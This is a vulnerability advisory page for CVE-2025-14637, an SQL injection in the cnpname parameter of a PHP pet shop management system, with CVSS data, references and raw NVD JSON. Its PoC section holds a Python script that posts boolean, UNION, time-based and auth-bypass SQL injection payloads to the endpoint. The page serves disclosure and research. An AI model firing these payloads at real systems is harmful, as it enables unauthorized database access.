CVE-2025-14637

Description

A weakness has been identified in itsourcecode Online Pet Shop Management System 1.0. This vulnerability affects unknown code of the file /pet1/addcnp.php. This manipulation of the argument cnpname causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:facebook-riares:online_pet_shop_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

itsourcecode Online Pet Shop Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14637 SQL Injection PoC
# Target: itsourcecode Online Pet Shop Management System 1.0
# File: /pet1/addcnp.php
# Parameter: cnpname

def exploit_sqli(target_url):
    """Exploit SQL injection vulnerability in addcnp.php"""
    
    # Normal request to check if endpoint exists
    normal_data = {
        'cnpname': 'TestCategory'
    }
    
    # SQL Injection payloads for testing
    payloads = [
        "' OR '1'='1",  # Basic boolean-based injection
        "' UNION SELECT NULL--",  # UNION-based injection
        "' AND SLEEP(5)--",  # Time-based blind injection
        "' OR 1=1 LIMIT 1--"  # Authentication bypass attempt
    ]
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Testing SQL injection on cnpname parameter\n")
    
    for i, payload in enumerate(payloads, 1):
        print(f"[*] Testing payload {i}: {payload}")
        
        inject_data = {
            'cnpname': payload
        }
        
        try:
            response = requests.post(target_url, data=inject_data, timeout=10)
            
            # Check for SQL error indicators
            if 'mysql' in response.text.lower() or 'sql' in response.text.lower() or 'error' in response.text.lower():
                print(f"[+] Potential SQL injection detected!")
                print(f"[+] Response length: {len(response.text)}")
            else:
                print(f"[-] No obvious injection detected")
                
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")
        print()

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target = sys.argv[1]
    else:
        target = "http://target.com/pet1/addcnp.php"
    
    exploit_sqli(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14637
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14637
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14637/
[4] VulDB https://vuldb.com/cve/CVE-2025-14637
[5] https://github.com/sec-dreamer/vulpxnPolm/issues/1
[6] https://itsourcecode.com/
[7] https://vuldb.com/?ctiid.336362
[8] https://vuldb.com/?id.336362
[9] https://vuldb.com/?submit.707271

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14637", "sourceIdentifier": "[email protected]", "published": "2025-12-13T20:15:39.547", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in itsourcecode Online Pet Shop Management System 1.0. This vulnerability affects unknown code of the file /pet1/addcnp.php. This manipulation of the argument cnpname causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:facebook-riares:online_pet_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "59A3F235-364A-4E05-BDF6-ACA976CAA212"}]}]}], "references": [{"url": "https://github.com/sec-dreamer/vulpxnPolm/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://itsourcecode.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://vuldb.com/?ctiid.336362", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.336362", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.707271", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}